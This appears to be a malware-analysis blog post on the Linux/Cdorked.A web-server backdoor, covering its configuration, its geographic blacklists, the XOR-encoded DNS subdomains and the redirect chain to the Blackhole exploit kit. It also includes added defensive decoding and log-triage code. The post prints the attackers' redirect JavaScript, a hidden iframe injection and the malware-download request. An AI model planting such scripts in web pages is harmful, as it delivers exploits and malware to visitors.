Linux/Cdorked.A: Web servers running Lighttpd and nginx are at risk

    In the previous part of our study, we promised to publish a continuation of the analysis of the Linux server infection incident involving the Linux/Cdorked.A backdoor. We already wrote that our laboratory's specialists established its main task, which is to redirect web server visitors to malicious websites. Investigating this incident in more detail, we came to the following conclusions:

    • In total, more than 400 web servers infected with Linux/Cdorked.A were detected; 50 of them host websites included in Alexa's TOP 100,000 most popular websites.
    • The backdoor compromised web servers running not only Apache but also Lighttpd and nginx.
    • According to our telemetry systems, this threat has been active since December 2012.
    • The backdoor uses additional mechanisms to stay hidden. In particular, we found that the malicious code will not redirect users whose client IP address falls within the ranges on its blacklist. This blacklist is quite large and includes addresses belonging to countries such as Japan, Finland, Russia, Ukraine, Kazakhstan and Belarus. In addition, a country check is also performed on the Accept-Language HTTP header.
    • Our cloud technology has seen nearly 100,000 users of ESET products being redirected to links generated by compromised web servers; the antivirus blocked these redirections to malicious content.
    • In some cases, we observed special redirects for the Apple iPad and iPhone platforms.




    In this post we look in more detail at the backdoor capabilities identified during the analysis, describe the malicious content delivered to users, and show how a user is redirected to an exploit kit.

    It should be noted that we do not know for certain how the backdoor got onto the servers, and the attack vector may not have been unique. We cannot claim that a cPanel weakness was used to install it, since not all of the compromised servers were managed by cPanel. The backdoor has no self-propagation mechanism and does not exploit a vulnerability in server software to install itself.

    The following screenshots show the places in the backdoor code where remote access to the server is opened, in the different binaries that replace the legitimate Lighttpd, nginx and Apache files.


    Lighttpd


    nginx


    Apache

    The backdoor code looks identical in all three cases, but the hooks used inside some functions are different because they depend on the selected server and its data structures.

    Backdoor features

    We have already mentioned the commands supported by the backdoor. In this analysis, we will dwell on them in more detail.



    These lists are stored in a shared memory area that can be accessed using our analysis tool. The settings listed in the table really give attackers an excellent opportunity to fine-tune their malicious code when choosing targets for an attack. Linux / Cdorked.A maintains a list of IP addresses of already redirected clients, indicating the redirection time. This avoids re-redirecting for a specified period of time. None of these settings are stored in a file on disk and each of them is modified through special HTTP requests processed by the backdoor.

    Typical backdoor configuration

    With the help of the system administrators who took part in investigating the web server compromises, as well as specialists from the company Sucuri, we were able to obtain dumps of the memory regions in which Linux/Cdorked.A stores its configuration. An example of one of these dumps:



    So far, we have not obtained any Linux/Cdorked.A configuration containing more than one redirect URL. The redirect applies to clients whose requests to the server come from Internet Explorer or Firefox on Windows XP, Vista or 7. Apple iPhone and iPad users were also targeted; instead of being sent to an exploit kit, however, they were redirected to a web page with links to pornographic websites. The following screenshot shows such a redirect on an iPhone.



    We have already mentioned that the Linux/Cdorked.A configuration includes an extensive blacklist of IP address ranges. Visitors reaching a compromised web server from one of these addresses are never redirected to malicious content. In the backdoor configurations we observed, the blacklisted ranges covered 50% of the entire IPv4 address space. A client is also not redirected if the language in the Accept-Language field of the browser's HTTP request is blacklisted. The list includes the following languages:

    • ja, jp - Japanese;
    • fi - Finnish;
    • ru - Russian;
    • uk - Ukrainian;
    • be - Belarusian;
    • kk - Kazakh.

    The cybercriminals deliberately limited the geographic reach of the backdoor: uncontrolled infection of users could hamper the maintenance of already compromised servers and attract unnecessary suspicion.

    Redirect statistics

    These malicious redirects share a common trait: when clients are redirected to Blackhole, the URL pattern contains the "/info/last" part. The earliest traces of malicious activity we tracked use the same "/info/last" URL pattern, together with identical DNS patterns, which are described later.

    Analyzing the traffic, we discovered more than 400 web servers affected by Linux/Cdorked.A; 50 of them host websites ranked in the Alexa TOP 100,000 most popular websites. After the first part of our analysis was published, some of the owners of these servers removed the threat from them.



    Linux/Cdorked.A keeps a timestamp of the last redirection for each client IP address. We extracted this information from a memory dump to estimate how many redirects a single server can perform in a day: one of the dumps showed a server that carried out more than 28,000 redirects in 24 hours. Such servers are not active all the time; redirection statistics for several servers are shown below.





    DNS hijacking

    The URLs used by the backdoor for redirects often change. However, there are several patterns:

    • The domain name usually follows the pattern [digits, a, b or c][characters].[tld].
    • The next-level subdomain is always 16 hexadecimal characters long.

    The specific format of the subdomains, and the fact that they change constantly, gives us reason to believe that some DNS servers have been compromised. We ran several tests in which we modified characters of the subdomain ourselves and, in some cases, the IP address it resolved to changed. Further tests confirmed that the IP address returned by DNS is actually encoded in the subdomain name itself: the characters in odd positions form a hex string representing 4 bytes, from which the IP address is derived with an XOR scheme:



    The IP address is computed as follows:

    byte[] = { 16, 70, 183, 11 }   // from the hex string taken from the subdomain
    seed = 49                      // this seed changes; we have not yet found where it comes from
    ip[0] = seed ^ byte[0]         // 33
    ip[1] = byte[0] ^ byte[1]      // 86
    ip[2] = byte[1] ^ byte[2]      // 241
    ip[3] = byte[2] ^ byte[3]      // 188
    // The octets are used in reverse order, giving the IP address 188.241.86.33
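    Decoding the address embedded in a redirect subdomain, as an added example (not the post's code or ESET's tool): it applies the XOR scheme above to the 16-hex-character label and also goes beyond the text by checking an observed DNS answer against the label and recovering the seed from it, since three of the four octets do not depend on the seed. Assumptions: "odd positions" means the 1st, 3rd, ... characters (string indices 0, 2, ...), and the label and host names are constructed.

```python
import re
from typing import Optional

# Added example, not code from the original post or from ESET's tool: decode
# the IPv4 address that Linux/Cdorked.A embeds in the 16-hex-character
# subdomain of its redirect URLs, using the XOR scheme described above.
LABEL_RE = re.compile(r"^[0-9a-f]{16}$")

def hex_from_label(label: str) -> Optional[str]:
    """Return the 8 hex characters in the odd positions (1st, 3rd, ...) of a
    16-hex-character DNS label, or None if the label does not fit the pattern.
    Assumption: 'odd positions' counts from 1, i.e. string indices 0, 2, ..., 14."""
    label = label.lower()
    if not LABEL_RE.match(label):
        return None
    return label[0::2]

def decode_ip(hex8: str, seed: int) -> str:
    """Chained XOR from the post; the four octets come out in reverse order."""
    b = bytes.fromhex(hex8)
    ip = [seed ^ b[0], b[0] ^ b[1], b[1] ^ b[2], b[2] ^ b[3]]
    return ".".join(str(octet) for octet in reversed(ip))

def decode_host(host: str, seed: int) -> Optional[str]:
    """Decode the address from a full host name whose first label fits the pattern."""
    hex8 = hex_from_label(host.split(".")[0])
    return None if hex8 is None else decode_ip(hex8, seed)

def recover_seed(hex8: str, observed_ip: str) -> Optional[int]:
    """Beyond the post: octets 1-3 do not depend on the seed, so a DNS answer can
    be checked against the label and the seed read off the remaining octet.
    Returns the seed, or None if the answer does not fit the encoding."""
    b = bytes.fromhex(hex8)
    try:
        octets = [int(o) for o in observed_ip.split(".")]
    except ValueError:
        return None
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        return None
    ip = octets[::-1]  # undo the reversal applied when the answer was built
    if ip[1:] != [b[0] ^ b[1], b[1] ^ b[2], b[2] ^ b[3]]:
        return None
    return ip[0] ^ b[0]

if __name__ == "__main__":
    # Constructed label: 1046b70b sits in its odd positions (the bytes listed above)
    host = "1a0b4c6dbe7f00b1.somedomain.com"
    print(decode_host(host, 49))                      # 188.241.86.33
    print(recover_seed("1046b70b", "188.241.86.33"))  # 49
```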


    Redirection chain

    If a client is redirected to malicious content, it passes through several special web pages before landing on the Blackhole exploit kit page. The following screenshot shows an example of such a chain.



    The first page, /index.php, carries a base64-encoded parameter that we documented in our previous article. Decoded, it looks as follows:

    ljroujxv=isiuzv&time=1305022208-2007115935&src=141&surl=somedomain.com&sport=80&key=ED143377&suri=/tr/zeki.htm

    This page contains JavaScript that redirects the user to the next page.

    // iflag is "1" when the page is loaded inside a frame (top != self)
    var iflag = "0";
    if (top != self) { iflag = "1"; }
    var b64str = "MTQxNDExMzA1MDIyMjQ4M...luLmNvbS9zb3J0LnBocA==";
    // b64dec() is a base64 decoder the page defines elsewhere
    setTimeout(function() {
        location.replace("hxxp://ae334b05c4249f38" + iflag + b64dec(b64str));
    }, 280);


    The URL of the second page consists of three parts: the initial subdomain, the value of the iflag variable, and the value of the b64str variable generated by the server. iflag is set to "1" if the current document is loaded inside a frame (top != self); in that case the server will most likely reject the request. The b64str value is supplied by the server and decodes to a URL with a very long subdomain part:

    1414113050222483098587bcf02fc1731aade45f74550b.somedomain.com/sort.php

    This long subdomain encodes specific information about the redirect, such as the source ID (src) obtained from the initial URL and the timestamp. The purpose of the remaining characters remains unknown.



    The third page, sort.php, directs the user to the fourth page, exit.php, after a timeout. A typical sort.php page looks as follows (b64dec() is a base64 decoder the page defines elsewhere):

    function gotime() {
        xflag = false;
        // after 21 seconds, replace the top document with exit.php
        top.location.replace(b64dec("aHR0cDovL2FlMzM0YjA1YzQyNDlmM...cD94PTEzNyZ0PXRpbWVvdXQ="));
    }
    var timer = setTimeout("gotime()", 21000);
    // meanwhile, inject the iframe about half a second after load
    var ewq;
    ewq = document.createElement("span");
    ewq.innerHTML = b64dec("PGlmcmFtZSBzcmM9Im...1lPjxicj4=");
    setTimeout(function() { document.body.insertBefore(ewq, document.body.lastChild); }, 504);

    The first base64 string (aHR...XQ=) decodes to the exit.php URL:

    hxxp://ae334b05c4249f38014141130...50222483098587bcf02fc1731aade45f74550b.somedomain.com/exit.php?x=137&t=timeout

    This fourth page shows pornographic images and provides links to pornographic websites. The page also contains an iframe that leads to the Blackhole page. It is not yet clear whether the links to porn content are malicious or part of an affiliate program. Below is the iframe leading to the Blackhole landing page, decoded from the second base64 string (PGl...j4=):

    <iframe src="hxxp://ae334b05c4249f38014141130502224830...98587bcf02fc1731aade45f74550b.somedomain.com/info/last/index.php"
        width="120" height="21" marginwidth="0" marginheight="0" frameborder="0"
        scrolling="no" allowtransparency="true">

    The last step is to download malware onto the victim's computer if one of the exploits succeeds:

    GET /get3.php?e=176541242&tc=1305022250-072800c977&uid=536201305032119591656771 HTTP/1.0
    Host: ae334b05c4249f38.somedomain.
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*


    Our tests and telemetry data show that the Win32/Glupteba.G Trojan was installed on users' computers.
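    A triage routine for this redirect chain, added here as an example (not code from the original post): it scans constructed proxy-log lines for the hex-only subdomain, the /info/last, sort.php, exit.php and get3.php paths and the NSISDL/1.2 downloader user agent, and decodes the first-stage base64 parameter to recover the compromised source site (surl) that sent the visitor. The log layout, the query parameter name p and the hxxp-defanged host names are assumptions.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qs

# Added example, not code from the original post: triage constructed proxy-log
# lines for the Linux/Cdorked.A redirect chain. Assumed log layout (constructed):
# "<client-ip> <method> <url> <user-agent>". Hosts use the post's placeholder domain.
HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$")  # 16-hex subdomain, or the longer variant
CHAIN_PATHS = ("/info/last/index.php", "/sort.php", "/exit.php", "/get3.php")
STAGE1 = ("ljroujxv=isiuzv&time=1305022208-2007115935&src=141&surl=somedomain.com"
          "&sport=80&key=ED143377&suri=/tr/zeki.htm")
SAMPLE_LOG = [  # constructed; the first line carries STAGE1 base64-encoded
    "10.0.0.5 GET hxxp://ae334b05c4249f38.somedomain.com/index.php?p="
    + base64.b64encode(STAGE1.encode()).decode() + " Mozilla/5.0",
    "10.0.0.5 GET hxxp://ae334b05c4249f38014141130502224830.somedomain.com/info/last/index.php Mozilla/5.0",
    "10.0.0.5 GET hxxp://ae334b05c4249f38.somedomain.com/get3.php?e=1 NSISDL/1.2 (Mozilla)",
    "10.0.0.7 GET hxxp://www.somedomain.com/index.php?id=5 Mozilla/5.0",
]

def stage1_params(url: str):
    """Return the decoded first-stage parameters (time, src, surl, ...) as a dict
    when a query value base64-decodes to that string, else None."""
    for kv in urlsplit(url).query.split("&"):
        value = kv.partition("=")[2]  # keep '+' and '=' padding intact
        try:
            text = base64.b64decode(value, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if "surl=" in text and "suri=" in text:
            return {k: v[0] for k, v in parse_qs(text).items()}
    return None

def triage(line: str):
    """Return (client, reasons); an empty reasons list means nothing matched."""
    client, _method, url, ua = line.split(maxsplit=3)
    parts = urlsplit(url)
    reasons = []
    if HEX_LABEL.match((parts.hostname or "").split(".")[0]):
        reasons.append("hex-only subdomain")
    if parts.path in CHAIN_PATHS or parts.path.startswith("/info/last"):
        reasons.append("redirect-chain path " + parts.path)
    if ua.startswith("NSISDL/"):
        reasons.append("NSISDL downloader user agent")
    params = stage1_params(url)
    if params:
        reasons.append("redirected from compromised site " + params["surl"])
    return client, reasons
```

    Running triage() over each SAMPLE_LOG entry flags the first three lines and leaves the fourth, an ordinary request, with no reasons.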

    Recovery

    In a previous post we already recommended that system administrators verify the integrity of the main binaries stored on the server. We also published the dump_cdorked_config tool, which dumps the memory region holding the Linux/Cdorked.A configuration. The tool has been updated to detect all variants of the backdoor, including the nginx and Lighttpd versions.

    For end users, we recommend keeping the browser, its extensions, the OS and critical software such as Java, Adobe Reader and Flash Player up to date. Using antivirus software is also good practice.
